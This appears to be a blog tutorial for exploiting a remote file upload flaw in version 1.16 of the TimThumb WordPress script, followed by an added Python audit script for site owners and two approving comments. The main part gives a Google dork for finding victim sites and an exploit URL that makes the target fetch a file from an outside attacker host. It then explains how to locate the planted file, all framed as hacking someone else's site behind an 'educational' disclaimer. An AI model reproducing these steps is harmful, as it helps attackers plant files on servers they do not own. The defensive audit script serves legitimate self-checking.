WordPress TimThumb Plugin - Remote File Upload Vulnerability

Before starting, I want to tell you one important thing: this vulnerability only works on version 1.16 of the TimThumb plugin.
So now let's begin:

  • First of all, find a vulnerable site with a Google dork: inurl:wp-content/plugins/highlighter timthumb.php
  • I already have one. After finding a site, check whether it is vulnerable by opening timthumb.php, for example http://www.example.com/wp-content/plugins/highlighter/libs/timthumb.php. This will show the version of the TimThumb plugin.
  • If the version is 1.16, well and good; otherwise find another site. It will look something like this.

  • After that, change the URL to http://www.example.com/wp-content/plugins/highlighter/libs/timthumb.php?src=yourfile.
    For example:
    http://www.example.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://stylo388.my3gb.com/index%20-%20Copy.html
  • Your uploaded file will then be found at http://www.example.com/wp-content/plugins/highlighter/libs/temp/.
[Note: Your uploaded file will be renamed randomly, like efe17a61fc0829a5e3188ddc30820788.html.]
  • To find your file, go to http://www.example.com/wp-content/plugins/highlighter/libs/temp/, then find your uploaded file by looking at the upload dates.

  • After that, open your uploaded file.
  • Ch33R$ !! Now you have successfully done it.
Note: This is for educational purposes only. We are not responsible for any harm done by you or any illegal activity.
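
For a site owner checking their own install, the script below is an added example, not part of the original post. It walks a WordPress tree, reads the version each timthumb.php copy declares, and lists files in the adjacent temp/ directory that carry the 32-hex-character names described above with a non-image extension. The `define('VERSION', ...)` line format and the list of image extensions are assumptions.

```python
import os
import re
import sys

# Assumption: the script declares its version as define('VERSION', '1.16');
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([\d.]+)['\"]")
# Per the post, fetched files are stored under a 32-hex-character name.
CACHE_NAME_RE = re.compile(r"^[0-9a-f]{32}\.([A-Za-z0-9]+)$")
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}  # assumed legitimate cache types
AFFECTED_VERSION = "1.16"  # the only version the post names


def timthumb_version(path):
    """Return the version declared in one timthumb.php copy, or None."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        match = VERSION_RE.search(fh.read())
    return match.group(1) if match else None


def suspicious_cache_files(temp_dir):
    """List hash-named cache files whose extension is not an image type."""
    if not os.path.isdir(temp_dir):
        return []
    hits = []
    for name in sorted(os.listdir(temp_dir)):
        m = CACHE_NAME_RE.match(name)
        if m and m.group(1).lower() not in IMAGE_EXTS:
            hits.append(os.path.join(temp_dir, name))
    return hits


def audit(webroot):
    """Report every timthumb.php under webroot with its version and cache hits."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name.lower() != "timthumb.php":
                continue
            script = os.path.join(dirpath, name)
            version = timthumb_version(script)
            temp = os.path.join(dirpath, "temp")  # cache dir beside the script
            findings.append({"script": script, "version": version,
                             "affected": version == AFFECTED_VERSION,
                             "suspicious": suspicious_cache_files(temp)})
    return findings


if __name__ == "__main__":
    for finding in audit(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```

Run it with the web root as the only argument; any entry with `affected` set or a non-empty `suspicious` list is worth reviewing by hand.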

2 comments:

  1. thank you, these tutorials help new learners like me :) keep it up.
  2. stay tuned for more tutorials :)